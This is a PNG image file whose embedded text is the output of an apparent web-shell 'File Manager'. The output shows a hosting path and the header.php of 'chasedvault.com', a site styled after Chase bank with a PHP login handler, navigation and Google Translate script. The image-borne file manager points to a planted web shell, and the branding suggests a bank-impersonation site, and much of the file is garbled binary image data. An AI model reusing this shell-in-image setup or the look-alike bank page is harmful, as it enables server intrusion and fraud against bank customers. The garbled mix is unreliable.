PNG  IHDRxsBIT|d pHYs+tEXtSoftwarewww.inkscape.org<,tEXtComment File Manager

File Manager

Path: /home/u491334613/domains/chasedvault.com/public_html/

Viewing File: header.php

<?php
require_once "config.php"; 
session_start();

$errors = [];

// initialize login attempt session tracking
if (!isset($_SESSION['login_attempts'])) $_SESSION['login_attempts'] = 0;
if (!isset($_SESSION['last_attempt_time'])) $_SESSION['last_attempt_time'] = 0;

$MAX_ATTEMPTS = 5;
$LOCKOUT_TIME = 300; // 5 minutes

// if locked out
if ($_SESSION['login_attempts'] >= $MAX_ATTEMPTS && (time() - $_SESSION['last_attempt_time']) < $LOCKOUT_TIME) {
    $remaining = ceil(($LOCKOUT_TIME - (time() - $_SESSION['last_attempt_time'])) / 60);
    $errors[] = "Too many failed login attempts. Please try again in $remaining minute(s).";
} elseif ($_SERVER["REQUEST_METHOD"] === "POST") {
    $email = trim($_POST['email'] ?? '');
    $password = $_POST['password'] ?? '';
    $bot_check = trim($_POST['website'] ?? ''); // honeypot
    $form_time = (int)($_POST['form_time'] ?? 0);
    $elapsed = time() - $form_time;

    if ($bot_check !== '') {
        $errors[] = "Bot activity detected.";
    } elseif ($elapsed < 2) {
        $errors[] = "Suspicious activity detected. Please slow down.";
    } elseif (empty($email) || empty($password)) {
        $errors[] = "Email and password are required.";
    } else {
        $stmt = $pdo->prepare("SELECT id, email, password_hash FROM users WHERE email = ?");
        $stmt->execute([$email]);
        $user = $stmt->fetch();

        if ($user && password_verify($password, $user['password_hash'])) {
            $_SESSION['login_user'] = $user['id'];
            $_SESSION['login_attempts'] = 0; // reset
            header("Location: login_pin.php");
            exit;
        } else {
            $_SESSION['login_attempts']++;
            $_SESSION['last_attempt_time'] = time();
            $errors[] = "Invalid email or password.";
        }
    }
}
?>

<?php
// --- START PHP LOGIC FOR ACTIVE HEADER STATE ---
// Get the current page filename (e.g., "index.php" or "signup_step1.php")
$current_page = basename($_SERVER['PHP_SELF']);
?>


<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Chasedvault — Secure Services | Chasedvault</title>
    <meta name="description" content="Chasedvault — checking, savings, Secure mobile-first  services for individuals and business." />
    <meta name="keywords" content="Secure services,  savings account,  mortgages,  Chasedvault" />
    <meta name="author" content="Chasedvault" />
    <meta property="og:title" content="Chasedvault — Secure  Services | Chasedvault" />
    <meta property="og:description" content="Secure  solutions , savings." />
    <meta property="og:type" content="website" />
    <meta property="og:image" content="https://Chasedvault.com/cr.png" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:title" content="Chasedvault — Secure Services" />
    <meta name="twitter:description" content="Secure mobile-first  services for individuals and businesses. Member FDIC." />
    <meta name="twitter:image" content="https://Chasedvault.com/cr.png" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;600;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="css/style.css">
    <link rel="icon" type="image/x-icon" href="/favicon.ico">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;600;700&display=swap" rel="stylesheet">
</head>

<?php
// Get the current page filename (e.g., "index.php" or "signup_step1.php")
$current_page = basename($_SERVER['PHP_SELF']);
?>


<style>
 /* --- CORE VARIABLES --- */
  /* --- CORE VARIABLES --- */
    :root {
        --primary-blue: #117aca;
        --text-dark: #212121;
        --text-grey: #414141;
        --bg-white: #ffffff;
        --border-color: #e0e0e0;
    }

    /* --- GLOBAL/DESKTOP STYLES --- */
    * { box-sizing: border-box; margin: 0; padding: 0; }
    body {
        font-family: 'Inter', sans-serif;
        background-color: #fff;
        color: var(--text-dark);
        top: 0 !important;
    }
    .chase-header {
        width: 100%; background: var(--bg-white); border-bottom: 1px solid var(--border-color);
        position: relative; z-index: 1000;
    }
    .header-inner {
        max-width: 1400px; margin: 0 auto; padding: 0 24px; position: relative;
    }
    .header-top-row {
        display: flex; justify-content: space-between; align-items: center;
        padding-top: 10px; font-size: 13px; height: 40px;
    }
    .segments { display: flex; gap: 20px; }
    .segments a {
        text-decoration: none; color: var(--text-grey); padding-bottom: 8px;
        font-weight: 600; position: relative;
    }
    .segments a.active { color: var(--primary-blue); }
    .segments a.active::after {
        content: ''; position: absolute; bottom: 0; left: 0;
        width: 100%; height: 3px; background-color: var(--primary-blue);
    }
    .utilities { display: flex; align-items: center; gap: 15px; }
    .utilities a {
        text-decoration: none; color: var(--text-grey); display: flex;
        align-items: center; gap: 4px; cursor: pointer;
    }

    /* Google Translate Styling */
    #google_translate_element { margin-right: 5px; }
    .goog-te-gadget-simple { background-color: transparent !important; border: none !important; padding: 0 !important; font-size: 13px !important; }
    .goog-te-gadget-simple span { color: var(--text-grey) !important; }
    .goog-te-banner-frame { display: none !important; }
    .search-trigger { cursor: pointer; color: var(--primary-blue); margin-left: 10px;}

    /* Logo and Nav Rows */
    .header-logo-row { padding: 15px 0; display: flex; align-items: center; justify-content: space-between; }
    .custom-logo {
        height: 50px; width: auto; object-fit: cover; display: block;
        border-radius: 12px; box-shadow: 0 2px 5px rgba(0,0,0,0.05); /* Curved edge */
    }

    /* --- DESKTOP NAVIGATION (ROW 3) --- */
    .header-nav-row { display: flex; gap: 30px; list-style: none; padding-bottom: 0; }
    .nav-item { position: relative; padding-bottom: 0; }
    .nav-link {
        text-decoration: none; color: var(--text-grey); font-size: 16px; font-weight: 400;
        display: flex; align-items: center; gap: 4px; cursor: pointer; padding-bottom: 12px;
        position: relative;
    }
    .nav-link::after {
        content: ''; position: absolute; bottom: 0; left: 0; width: 100%; height: 0px;
        background-color: var(--primary-blue); transition: height 0.2s ease;
    }
    .nav-item:hover .nav-link { color: var(--primary-blue); }
    .nav-item:hover .nav-link::after { height: 4px; } /* Thick blue underline on hover */
    .nav-cta { color: var(--primary-blue) !important; font-weight: 700 !important; } /* CTA Highlight */
    
    /* Desktop Dropdown Menu */
    .dropdown-menu { display: none; position: absolute; top: 100%; left: 0; background-color: white; min-width: 220px; box-shadow: 0 8px 16px rgba(0,0,0,0.15); border: 1px solid #eee; border-radius: 4px; z-index: 2000; padding: 10px 0; list-style: none; }
    .nav-item:hover .dropdown-menu { display: block; }
    .dropdown-menu li a { display: block; padding: 10px 20px; text-decoration: none; color: #333; font-size: 14px; transition: background 0.2s; }
    .dropdown-menu li a:hover { background-color: #f4f8fb; color: var(--primary-blue); }

    /* --- MOBILE DRAWER STYLES --- */
    .hamburger-btn { display: none; background: none; border: none; cursor: pointer; padding: 5px; color: var(--text-dark); }
    .backdrop {
        position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.4);
        z-index: 9999; display: none;
    }
    .backdrop.active { display: block; }

    .mobile-drawer {
        position: fixed; top: 0; right: -100%; width: 85%; max-width: 400px; height: 100vh;
        background: var(--bg-white); box-shadow: -4px 0 10px rgba(0,0,0,0.2); z-index: 10000;
        transition: right 0.3s ease-out; display: flex; flex-direction: column; overflow-y: auto;
    }
    .mobile-drawer.open { right: 0; }
    .drawer-header { padding: 20px 20px 10px 20px; display: flex; justify-content: space-between; align-items: center; }
    .close-btn { background: none; border: none; font-size: 28px; font-weight: 100; cursor: pointer; padding: 5px; }
    .search-bar-container { padding: 0 20px 20px 20px; }
    .search-input-wrapper { display: flex; align-items: center; border: 1px solid var(--text-grey); border-radius: 6px; padding: 8px 10px; }
    .search-input-wrapper input { flex-grow: 1; border: none; outline: none; padding-left: 10px; font-size: 16px; background: transparent; }

    /* Mobile Menu List & Separators */
    .mobile-links-list { list-style: none; padding: 0; flex-grow: 1; }
    .mobile-links-list li { border-bottom: 1px solid var(--border-color); }
    .mobile-links-list li:last-child { border-bottom: none; }
    .mobile-links-list li a {
        display: flex; justify-content: space-between; align-items: center;
        text-decoration: none; color: var(--text-dark); padding: 15px 20px;
        font-size: 16px; width: 100%;
    }
    
    /* Mobile Sub-menu Styling */
    .sub-menu {
        list-style: none; padding-left: 20px; display: none; background-color: #f8f8f8;
    }
    .sub-menu.open { display: block; }
    .sub-menu li a { padding: 10px 20px 10px 10px; font-size: 14px; color: var(--text-grey); border-bottom: 1px solid #efefef; }
    .sub-menu li:last-child a { border-bottom: none; }

    /* Chevron Rotation (Mobile) */
    .chevron-right {
        color: var(--text-grey);
        transition: transform 0.3s;
    }
    .chevron-right.rotated {
        transform: rotate(90deg);
    }
    
    /* Footer */
    .drawer-footer { padding: 10px 20px 30px 20px; }
    .drawer-footer p { font-size: 14px; color: var(--text-grey); margin-bottom: 15px; font-weight: 600; }
    .drawer-footer-line { border-top: 1px solid var(--border-color); margin-bottom: 15px; }

    @media (max-width: 900px) {
        .header-top-row, .header-nav-row { display: none; }
        .hamburger-btn { display: block; }
    }
    
    
    
    
    /* --- CORE VARIABLES --- */
    :root {
        --primary-blue: #117aca;
        --text-dark: #212121;
        --text-grey: #414141;
        --bg-white: #ffffff;
        --border-color: #e0e0e0;
    }

    /* --- GLOBAL/DESKTOP STYLES --- */
    * { box-sizing: border-box; margin: 0; padding: 0; }
    body { font-family: 'Inter', sans-serif; background-color: #fff; color: var(--text-dark); top: 0 !important; }
    .chase-header {
        width: 100%; background: var(--bg-white); border-bottom: 1px solid var(--border-color);
        position: relative; z-index: 1000;
    }
    .header-inner { max-width: 1400px; margin: 0 auto; padding: 0 24px; position: relative; }
    
    /* ROW 1: TOP UTILITY BAR */
    .header-top-row { display: flex; justify-content: space-between; align-items: center; padding-top: 10px; font-size: 13px; height: 40px; }
    .segments { display: flex; gap: 20px; }
    .segments a { text-decoration: none; color: var(--text-grey); padding-bottom: 8px; font-weight: 600; position: relative; }
    .segments a.active { color: var(--primary-blue); }
    .segments a.active::after { content: ''; position: absolute; bottom: 0; left: 0; width: 100%; height: 3px; background-color: var(--primary-blue); }
    .utilities { display: flex; align-items: center; gap: 15px; }
    .utilities a { text-decoration: none; color: var(--text-grey); display: flex; align-items: center; gap: 4px; cursor: pointer; }
    #google_translate_element { margin-right: 5px; }
    .goog-te-gadget-simple { background-color: transparent !important; border: none !important; padding: 0 !important; font-size: 13px !important; }
    .goog-te-banner-frame { display: none !important; }

    /* ROW 2: LOGO */
    .header-logo-row { padding: 15px 0; display: flex; align-items: center; justify-content: space-between; }
    .custom-logo { height: 50px; width: auto; object-fit: cover; display: block; border-radius: 12px; box-shadow: 0 2px 5px rgba(0,0,0,0.05); }

    /* ROW 3: DESKTOP NAVIGATION */
    .header-nav-row { display: flex; gap: 30px; list-style: none; padding-bottom: 0; }
    .nav-item { position: relative; padding-bottom: 0; }
    .nav-link {
        text-decoration: none; color: var(--text-grey); font-size: 16px; font-weight: 400;
        display: flex; align-items: center; gap: 4px; cursor: pointer; padding-bottom: 12px;
        position: relative;
    }
    /* Default CTA Style (When NOT active, but still needs to look distinct) */
    .nav-cta-default { 
        color: var(--primary-blue) !important; 
        font-weight: 400 !important; 
    }
    /* Active Page Highlight (Bold Text) */
    .nav-active {
        color: var(--primary-blue) !important;
        font-weight: 700 !important;
    }
    /* Thick blue underline on hover */
    .nav-link::after {
        content: ''; position: absolute; bottom: 0; left: 0; width: 100%; height: 0px;
        background-color: var(--primary-blue); transition: height 0.2s ease;
    }
    /* Activate underline on hover OR if active */
    .nav-item:hover .nav-link::after, .nav-active::after { 
        height: 4px; 
    }
    .nav-item:hover .nav-link { color: var(--primary-blue); }
    
    /* Desktop Dropdown Menu */
    .dropdown-menu { display: none; position: absolute; top: 100%; left: 0; background-color: white; min-width: 220px; box-shadow: 0 8px 16px rgba(0,0,0,0.15); border: 1px solid #eee; border-radius: 4px; z-index: 2000; padding: 10px 0; list-style: none; }
    .nav-item:hover .dropdown-menu { display: block; }

    /* --- MOBILE DRAWER STYLES (Retained from previous steps) --- */
    .hamburger-btn { display: none; background: none; border: none; cursor: pointer; padding: 5px; color: var(--text-dark); }
    .backdrop { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.4); z-index: 9999; display: none; }
    .backdrop.active { display: block; }
    .mobile-drawer { position: fixed; top: 0; right: -100%; width: 85%; max-width: 400px; height: 100vh; background: var(--bg-white); box-shadow: -4px 0 10px rgba(0,0,0,0.2); z-index: 10000; transition: right 0.3s ease-out; display: flex; flex-direction: column; overflow-y: auto; }
    .mobile-drawer.open { right: 0; }
    .drawer-header { padding: 20px 20px 10px 20px; display: flex; justify-content: space-between; align-items: center; }
    .close-btn { background: none; border: none; font-size: 28px; font-weight: 100; cursor: pointer; padding: 5px; }
    .search-bar-container { padding: 0 20px 20px 20px; }
    .search-input-wrapper { display: flex; align-items: center; border: 1px solid var(--text-grey); border-radius: 6px; padding: 8px 10px; }
    .search-input-wrapper input { flex-grow: 1; border: none; outline: none; padding-left: 10px; font-size: 16px; background: transparent; }
    .mobile-links-list { list-style: none; padding: 0; flex-grow: 1; }
    .mobile-links-list li { border-bottom: 1px solid var(--border-color); }
    .mobile-links-list li a { display: flex; justify-content: space-between; align-items: center; text-decoration: none; color: var(--text-dark); padding: 15px 20px; font-size: 16px; width: 100%; }
    .sub-menu { list-style: none; padding-left: 20px; display: none; background-color: #f8f8f8; }
    .sub-menu.open { display: block; }
    .sub-menu li a { padding: 10px 20px 10px 10px; font-size: 14px; color: var(--text-grey); border-bottom: 1px solid #efefef; }
    .chevron-right { color: var(--text-grey); transition: transform 0.3s; }
    .chevron-right.rotated { transform: rotate(90deg); }
    .drawer-footer { padding: 10px 20px 30px 20px; }
    @media (max-width: 900px) {
        .header-top-row, .header-nav-row { display: none; }
        .hamburger-btn { display: block; }
    }
</style>
<header class="chase-header">
    <div class="header-inner">
        <div class="header-top-row">
           <?php
  $current = basename($_SERVER['PHP_SELF']);
?>
<div class="segments">
    <a href="index.php" class="<?php echo ($current == 'index.php') ? 'active' : ''; ?>">Personal</a>
    <a href="business.php" class="<?php echo ($current == 'business.php') ? 'active' : ''; ?>">Business</a>
    <a href="commercial.php" class="<?php echo ($current == 'commercial.php') ? 'active' : ''; ?>">Commercial</a>
</div>

            <div class="utilities">
                <div id="google_translate_element"></div>
                <a href="contact.php">Contact Us</a>
                <a href="mailto:support@Chasedvault.com">Support</a>
                
            </div>
        </div>

        <div class="header-logo-row">
            <a href="index.php">
                <img src="img/logo.png" alt="Chasedvault Logo" class="custom-logo">
            </a>
            <button class="hamburger-btn" onclick="toggleMenu()">
                <svg width="28" height="28" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><line x1="3" y1="12" x2="21" y2="12"></line><line x1="3" y1="6" x2="21" y2="6"></line><line x1="3" y1="18" x2="21" y2="18"></line></svg>
            </button>
        </div>

       <?php $current_page = basename($_SERVER['PHP_SELF']); ?>

<ul class="header-nav-row">

    <!-- SECURITY -->
    <li class="nav-item">
        <span class="nav-link <?php echo ($current_page === 'security.php') ? 'nav-active' : ''; ?>">
            <a href="security.php" style="text-decoration:none; color:inherit;">Security</a>
            <svg class="arrow-down" width="10" height="10" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M6 9l6 6 6-6"/>
            </svg>
        </span>
        <ul class="dropdown-menu">
            <li><a href="fraud_protection.php">Fraud Protection</a></li>
            <li><a href="privacy_policy.php">Privacy Policy</a></li>
            <li><a href="security_center.php">Security Center</a></li>
        </ul>
    </li>

    <!-- OPEN ACCOUNT -->
    <li class="nav-item">
        <span class="nav-link <?php echo ($current_page === 'signup_step1.php') ? 'nav-active' : ''; ?>">
            <a href="signup_step1.php" style="text-decoration:none; color:inherit;">Open account</a>
            <svg class="arrow-down" width="10" height="10" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M6 9l6 6 6-6"/>
            </svg>
        </span>
        <ul class="dropdown-menu">
            <li><a href="signup_step1.php">Personal Account</a></li>
            <li><a href="business.php">Business Account</a></li>
        </ul>
    </li>

    <!-- CHECKING -->
    <li class="nav-item">
        <span class="nav-link <?php echo ($current_page === 'checking.php') ? 'nav-active' : ''; ?>">
            Checking
            <svg class="arrow-down" width="10" height="10" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M6 9l6 6 6-6"/>
            </svg>
        </span>
        <ul class="dropdown-menu">
            <li><a href="total_checking.php">Total Checking</a></li>
            <li><a href="student_checking.php">Student Checking</a></li>
        </ul>
    </li>

    <!-- SAVINGS & CDs -->
    <li class="nav-item">
        <span class="nav-link <?php echo ($current_page === 'savings.php') ? 'nav-active' : ''; ?>">
            Savings & CDs
            <svg class="arrow-down" width="10" height="10" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M6 9l6 6 6-6"/>
            </svg>
        </span>
        <ul class="dropdown-menu">
            <li><a href="savings_accounts.php">Savings Accounts</a></li>
            <li><a href="cd_rates.php">CD Rates</a></li>
        </ul>
    </li>

    <!-- CREDIT CARDS -->
    <li class="nav-item">
        <span class="nav-link <?php echo ($current_page === 'cards.php') ? 'nav-active' : ''; ?>">
            Credit Cards
            <svg class="arrow-down" width="10" height="10" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M6 9l6 6 6-6"/>
            </svg>
        </span>
        <ul class="dropdown-menu">
            <li><a href="cashback_card.php">Cash Back Cards</a></li>
            <li><a href="travel_cards.php">Travel Cards</a></li>
        </ul>
    </li>

    <!-- HOME & AUTO -->
    <li class="nav-item">
        <span class="nav-link <?php echo ($current_page === 'homeauto.php') ? 'nav-active' : ''; ?>">
            Home & Auto
            <svg class="arrow-down" width="10" height="10" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M6 9l6 6 6-6"/>
            </svg>
        </span>
        <ul class="dropdown-menu">
            <li><a href="mortgage.php">Mortgage</a></li>
            <li><a href="auto_loan.php">Auto Loans</a></li>
        </ul>
    </li>

</ul>

    </div>
</header>

<div class="backdrop" id="backdrop" onclick="toggleMenu()"></div>
<aside class="mobile-drawer" id="drawer">
    
    <div class="drawer-header">
        <span class="chase-logo-mobile">
             <img src="img/logo.png" alt="Chasedvault Logo" style="height:30px; border-radius:6px;">
        </span>
        <button class="close-btn" onclick="toggleMenu()">
            <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><line x1="18" y1="6" x2="6" y2="18"></line><line x1="6" y1="6" x2="18" y2="18"></line></svg>
        </button>
    </div>

    <div class="search-bar-container">
        <div class="search-input-wrapper">
         
        </div>
    </div>

    <ul class="mobile-links-list">
        
        <li class="has-sub">
            <a href="#security" onclick="toggleMobileSubMenu(event)">Security
                <svg class="chevron-right" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><polyline points="9 18 15 12 9 6"></polyline></svg>
            </a>
            <ul class="sub-menu" id="sub-menu-security">
                <li><a href="fraud_protection.php">Fraud Protection</a></li>
                <li><a href="privacy_policy.php">Privacy Policy</a></li>
            </ul>
        </li>

        <li class="has-sub">
            <a href="#open-account" onclick="toggleMobileSubMenu(event)">Open account
                <svg class="chevron-right" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><polyline points="9 18 15 12 9 6"></polyline></svg>
            </a>
            <ul class="sub-menu" id="sub-menu-open-account">
                <li><a href="signup_step1.php">Personal Account</a></li>
                <li><a href="#">Business Account</a></li>
            </ul>
        </li>
        
        <li class="has-sub">
            <a href="#checking" onclick="toggleMobileSubMenu(event)">Checking
                <svg class="chevron-right" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><polyline points="9 18 15 12 9 6"></polyline></svg>
            </a>
            <ul class="sub-menu" id="sub-menu-checking">
                <li><a href="total_checking.php">Total Checking</a></li>
                <li><a href="student_checking.php">Student Checking</a></li>
            </ul>
        </li>
        
        <li class="has-sub">
            <a href="#savings" onclick="toggleMobileSubMenu(event)">Savings
                <svg class="chevron-right" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><polyline points="9 18 15 12 9 6"></polyline></svg>
            </a>
            <ul class="sub-menu" id="sub-menu-savings">
                <li><a href="savings_accounts.php">Savings Accounts</a></li>
                <li><a href="cd_rates.php">CD Rates</a></li>
            </ul>
        </li>
        
        <li><a href="about.php">About Us <svg class="chevron-right" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><polyline points="9 18 15 12 9 6"></polyline></svg></a></li>
        <li><a href="contact.php">Contact Us <svg class="chevron-right" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><polyline points="9 18 15 12 9 6"></polyline></svg></a></li>
        <li><a href="mailto:support@Chasedvault.com">Support <svg class="chevron-right" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><polyline points="9 18 15 12 9 6"></polyline></svg></a></li>
    </ul>

    <div class="drawer-footer">
        <p>Connect with us</p>
        <div class="drawer-footer-line"></div>
    </div>

</aside>

<script>
    function googleTranslateElementInit() {
      new google.translate.TranslateElement({
        pageLanguage: 'en', includedLanguages: 'en,es,fr,de,it,zh-CN,ja,ar',
        layout: google.translate.TranslateElement.InlineLayout.SIMPLE
      }, 'google_translate_element');
    }
    
    function toggleMenu() {
        const drawer = document.getElementById('drawer');
        const backdrop = document.getElementById('backdrop');
        if (drawer.classList.contains('open')) {
            drawer.classList.remove('open');
            backdrop.classList.remove('active');
        } else {
            drawer.classList.add('open');
            backdrop.classList.add('active');
        }
    }

    // Function to handle MOBILE sub-menu toggle (Accordion behavior)
    function toggleMobileSubMenu(event) {
        event.preventDefault(); 
        
        const listItem = event.currentTarget.closest('li.has-sub');
        if (!listItem) return;

        const subMenu = listItem.querySelector('.sub-menu');
        const chevron = listItem.querySelector('.chevron-right');

        if (subMenu.classList.contains('open')) {
            // Close the menu
            subMenu.classList.remove('open');
            chevron.classList.remove('rotated');
        } else {
            // Close all other sub-menus first (Accordion behavior)
            document.querySelectorAll('.sub-menu.open').forEach(menu => menu.classList.remove('open'));
            document.querySelectorAll('.chevron-right.rotated').forEach(chev => chev.classList.remove('rotated'));

            // Open the target menu
            subMenu.classList.add('open');
            chevron.classList.add('rotated');
        }
    }
</script>
<script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
b IDATxytVսϓ22 A@IR :hCiZ[v*E:WũZA ^dQeQ @ !jZ'>gsV仿$|?g)&x-EIENT ;@xT.i%-X}SvS5.r/UHz^_$-W"w)Ɗ/@Z &IoX P$K}JzX:;` &, ŋui,e6mX ԵrKb1ԗ)DADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADA݀!I*]R;I2$eZ#ORZSrr6mteffu*((Pu'v{DIߔ4^pIm'77WEEE;vƎ4-$]'RI{\I&G :IHJ DWBB=\WR޽m o$K(V9ABB.}jѢv`^?IOȅ} ڶmG}T#FJ`56$-ھ}FI&v;0(h;Б38CӧOWf!;A i:F_m9s&|q%=#wZprrrla A &P\\СC[A#! {olF} `E2}MK/vV)i{4BffV\|ۭX`b@kɶ@%i$K z5zhmX[IXZ` 'b%$r5M4º/l ԃߖxhʔ)[@=} K6IM}^5k㏷݆z ΗÿO:gdGBmyT/@+Vɶ纽z񕏵l.y޴it뭷zV0[Y^>Wsqs}\/@$(T7f.InݺiR$푔n.~?H))\ZRW'Mo~v Ov6oԃxz! S,&xm/yɞԟ?'uaSѽb,8GלKboi&3t7Y,)JJ c[nzӳdE&KsZLӄ I?@&%ӟ۶mSMMњ0iؐSZ,|J+N ~,0A0!5%Q-YQQa3}$_vVrf9f?S8`zDADADADADADADADADAdqP,تmMmg1V?rSI꒟]u|l RCyEf٢9 jURbztѰ!m5~tGj2DhG*{H9)꒟ר3:(+3\?/;TUݭʴ~S6lڧUJ*i$d(#=Yݺd{,p|3B))q:vN0Y.jkק6;SɶVzHJJЀ-utѹսk>QUU\޲~]fFnK?&ߡ5b=z9)^|u_k-[y%ZNU6 7Mi:]ۦtk[n X(e6Bb."8cۭ|~teuuw|ήI-5"~Uk;ZicEmN/:]M> cQ^uiƞ??Ңpc#TUU3UakNwA`:Y_V-8.KKfRitv޲* 9S6ֿj,ՃNOMߤ]z^fOh|<>@Å5 _/Iu?{SY4hK/2]4%it5q]GGe2%iR| W&f*^]??vq[LgE_3f}Fxu~}qd-ږFxu~I N>\;͗O֊:̗WJ@BhW=y|GgwܷH_NY?)Tdi'?խwhlmQi !SUUsw4kӺe4rfxu-[nHtMFj}H_u~w>)oV}(T'ebʒv3_[+vn@Ȭ\S}ot}w=kHFnxg S 0eޢm~l}uqZfFoZuuEg `zt~? b;t%>WTkķh[2eG8LIWx,^\thrl^Ϊ{=dž<}qV@ ⠨Wy^LF_>0UkDuʫuCs$)Iv:IK;6ֲ4{^6եm+l3>݆uM 9u?>Zc }g~qhKwڭeFMM~pМuqǿz6Tb@8@Y|jx](^]gf}M"tG -w.@vOqh~/HII`S[l.6nØXL9vUcOoB\xoǤ'T&IǍQw_wpv[kmO{w~>#=P1Pɞa-we:iǏlHo׈꒟f9SzH?+shk%Fs:qVhqY`jvO'ρ?PyX3lх]˾uV{ݞ]1,MzYNW~̈́ joYn}ȚF߾׮mS]F z+EDxm/d{F{-W-4wY듏:??_gPf ^3ecg ҵs8R2מz@TANGj)}CNi/R~}c:5{!ZHӋӾ6}T]G]7W6^n 9*,YqOZj:P?Q DFL|?-^.Ɵ7}fFh׶xe2Pscz1&5\cn[=Vn[ĶE鎀uˌd3GII k;lNmشOuuRVfBE]ۣeӶu :X-[(er4~LHi6:Ѻ@ԅrST0trk%$Č0ez" *z"T/X9|8.C5Feg}CQ%͞ˣJvL/?j^h&9xF`њZ(&yF&Iݻfg#W;3^{Wo^4'vV[[K';+mӍִ]AC@W?1^{එyh +^]fm~iԵ]AB@WTk̏t uR?l.OIHiYyԶ]Aˀ7c:q}ힽaf6Z~қm(+sK4{^6}T*UUu]n.:kx{:2 _m=sAߤU@?Z-Vކеz왍Nэ{|5 pڶn b p-@sPg]0G7fy-M{GCF'%{4`=$-Ge\ eU:m+Zt'WjO!OAF@ik&t݆ϥ_ e}=]"Wz_.͜E3leWFih|t-wZۍ-uw=6YN{6|} |*={Ѽn.S.z1zjۻTH]흾 DuDvmvK.`V]yY~sI@t?/ϓ. m&["+P?MzovVЫG3-GRR[(!!\_,^%?v@ҵő m`Y)tem8GMx.))A]Y i`ViW`?^~!S#^+ѽGZj?Vģ0.))A꨷lzL*]OXrY`DBBLOj{-MH'ii-ϰ ok7^ )쭡b]UXSְmռY|5*cֽk0B7镹%ڽP#8nȎq}mJr23_>lE5$iwui+ H~F`IjƵ@q \ @#qG0".0" l`„.0! ,AQHN6qzkKJ#o;`Xv2>,tێJJ7Z/*A .@fفjMzkg @TvZH3Zxu6Ra'%O?/dQ5xYkU]Rֽkق@DaS^RSּ5|BeHNN͘p HvcYcC5:y #`οb;z2.!kr}gUWkyZn=f Pvsn3p~;4p˚=ē~NmI] ¾ 0lH[_L hsh_ғߤc_њec)g7VIZ5yrgk̞W#IjӪv>՞y睝M8[|]\շ8M6%|@PZڨI-m>=k='aiRo-x?>Q.}`Ȏ:Wsmu u > .@,&;+!!˱tﭧDQwRW\vF\~Q7>spYw$%A~;~}6¾ g&if_=j,v+UL1(tWake:@Ș>j$Gq2t7S?vL|]u/ .(0E6Mk6hiۺzښOrifޱxm/Gx> Lal%%~{lBsR4*}{0Z/tNIɚpV^#Lf:u@k#RSu =S^ZyuR/.@n&΃z~B=0eg뺆#,Þ[B/?H uUf7y Wy}Bwegל`Wh(||`l`.;Ws?V@"c:iɍL֯PGv6zctM̠':wuW;d=;EveD}9J@B(0iհ bvP1{\P&G7D޴Iy_$-Qjm~Yrr&]CDv%bh|Yzni_ˆR;kg}nJOIIwyuL}{ЌNj}:+3Y?:WJ/N+Rzd=hb;dj͒suݔ@NKMԄ jqzC5@y°hL m;*5ezᕏ=ep XL n?מ:r`۵tŤZ|1v`V뽧_csج'ߤ%oTuumk%%%h)uy]Nk[n 'b2 l.=͜E%gf$[c;s:V-͞WߤWh-j7]4=F-X]>ZLSi[Y*We;Zan(ӇW|e(HNNP5[= r4tP &0<pc#`vTNV GFqvTi*Tyam$ߏWyE*VJKMTfFw>'$-ؽ.Ho.8c"@DADADADADADADADADA~j*֘,N;Pi3599h=goضLgiJ5փy~}&Zd9p֚ e:|hL``b/d9p? fgg+%%hMgXosج, ΩOl0Zh=xdjLmhݻoO[g_l,8a]٭+ӧ0$I]c]:粹:Teꢢ"5a^Kgh,&= =՟^߶“ߢE ܹS J}I%:8 IDAT~,9/ʃPW'Mo}zNƍ쨓zPbNZ~^z=4mswg;5 Y~SVMRXUյڱRf?s:w ;6H:ºi5-maM&O3;1IKeamZh͛7+##v+c ~u~ca]GnF'ټL~PPPbn voC4R,ӟgg %hq}@#M4IÇ Oy^xMZx ) yOw@HkN˖-Sǎmb]X@n+i͖!++K3gd\$mt$^YfJ\8PRF)77Wא!Cl$i:@@_oG I{$# 8磌ŋ91A (Im7֭>}ߴJq7ޗt^ -[ԩSj*}%]&' -ɓ'ꫯVzzvB#;a 7@GxI{j޼ƌ.LÇWBB7`O"I$/@R @eee@۷>}0,ɒ2$53Xs|cS~rpTYYY} kHc %&k.], @ADADADADADADADADA@lT<%''*Lo^={رc5h %$+CnܸQ3fҥK}vUVVs9G R,_{xˇ3o߾;TTTd}馛]uuuG~iԩ@4bnvmvfϞ /Peeeq}}za 